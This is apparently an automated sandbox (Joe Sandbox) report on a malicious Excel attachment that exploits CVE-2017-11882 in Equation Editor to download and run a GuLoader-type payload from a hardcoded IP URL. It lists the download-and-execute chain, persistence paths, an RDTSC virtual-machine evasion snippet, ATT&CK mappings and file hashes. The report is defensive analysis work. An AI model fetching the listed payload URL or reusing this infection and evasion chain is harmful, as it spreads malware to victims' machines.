    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404CED
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004068DA
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: ACP-2210825ORDER.xlsOLE indicator, VBA macros: true
    Source: ~DF688530565CAD41F4.TMP.0.drOLE indicator, VBA macros: true
    Source: libgiognutls.dll.5.drStatic PE information: Number of sections : 11 > 10
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
    Source: ACP-2210825ORDER.xlsVirustotal: Detection: 26%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8371.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@4/20@0/1
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402104 CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: ACP-2210825ORDER.xlsOLE indicator, Workbook stream: true
    Source: ~DF688530565CAD41F4.TMP.0.drOLE indicator, Workbook stream: true
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: ACP-2210825ORDER.xlsStatic file information: File size 1130496 > 1048576
    Source: ACP-2210825ORDER.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10002DE0 push eax; ret
    Source: libgiognutls.dll.5.drStatic PE information: section name: .xdata
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93Jump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.BibJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\VatersotigesJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\KnoglemarvsundersgelsenJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\ArmoniacJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000030C53D8 second address: 00000000030C53D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2BE4B89A38h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, 39h 0x0000000a rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1488Thread sleep time: -240000s >= -30000s
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00406555 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040287E FindFirstFileW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: vbc.exe, 00000005.00000002.1184749045.00000000002E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540729 mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Scripting    		1
    Registry Run Keys / Startup Folder    		1
    Access Token Manipulation    		111
    Masquerading    		OS Credential Dumping11
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API    		Boot or Logon Initialization Scripts11
    Process Injection    		1
    Disable or Modify Tools    		LSASS Memory1
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Clipboard Data    		Exfiltration Over Bluetooth33
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution    		Logon Script (Windows)1
    Registry Run Keys / Startup Folder    		1
    Virtualization/Sandbox Evasion    		Security Account Manager1
    Remote System Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Access Token Manipulation    		NTDS2
    File and Directory Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer21
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
    Process Injection    		LSA Secrets15
    System Information Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common11
    Scripting    		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Obfuscated Files or Information    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ACP-2210825ORDER.xls27%VirustotalBrowse
    ACP-2210825ORDER.xls100%AviraEXP/CVE-2017-11882.Gen

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP100%AviraEXP/CVE-2017-11882.Gen
    C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll2%ReversingLabs
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://172.245.34.91/5643/VBC.exej0%Avira URL Cloudsafe
    http://172.245.34.91/5643/VBC.exel0%Avira URL Cloudsafe
    http://172.245.34.91/5643/VBC.exehhC:0%Avira URL Cloudsafe
    http://172.245.34.91/5643/VBC.exe100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://172.245.34.91/5643/VBC.exetrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://172.245.34.91/5643/VBC.exejEQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://172.245.34.91/5643/VBC.exelEQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drfalse
      		high
      http://172.245.34.91/5643/VBC.exehhC:EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      172.245.34.91
      		unknownUnited States
      		36352AS-COLOCROSSINGUStrue

      General Information

      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:755822
      Start date and time:2022-11-29 08:11:40 +01:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 57s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:ACP-2210825ORDER.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLS@4/20@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.8% (good quality ratio 84.3%)
      • Quality average: 87.7%
      • Quality standard deviation: 21.4%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      08:12:45API Interceptor102x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe

      Download File
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):477800
      Entropy (8bit):7.505402259729816
      Encrypted:false
      SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
      MD5:7081C4822CF1C7572DD82822B8F27C49
      SHA1:4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
      SHA-256:B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
      SHA-512:6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
      Malicious:true
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@..........................p............@.............................................h............5..X............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...0...............................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F090A1F.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):4056
      Entropy (8bit):1.929653848333741
      Encrypted:false
      SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
      MD5:4A103FC1809C8EA381D2ACB5380EF4F6
      SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
      SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
      SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A84DD94.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2677225081522296
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
      MD5:5A977E68E4AD913CC2A9FC917F1CA510
      SHA1:D68C009CC5EE57A931D1BB1D062294F319C03183
      SHA-256:82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
      SHA-512:71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
      Malicious:false
      Reputation:low
      Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C485423.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2677225081522296
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
      MD5:5A977E68E4AD913CC2A9FC917F1CA510
      SHA1:D68C009CC5EE57A931D1BB1D062294F319C03183
      SHA-256:82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
      SHA-512:71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
      Malicious:false
      Reputation:low
      Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\489D37C8.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):17500
      Entropy (8bit):2.2754571047715912
      Encrypted:false
      SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
      MD5:38A09794AE082E08EA4F8B6E517F4814
      SHA1:8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
      SHA-256:22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
      SHA-512:2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
      Malicious:false
      Reputation:low
      Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):4056
      Entropy (8bit):1.929653848333741
      Encrypted:false
      SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
      MD5:4A103FC1809C8EA381D2ACB5380EF4F6
      SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
      SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
      SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\628281DB.emf

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):321644
      Entropy (8bit):2.239527826723405
      Encrypted:false
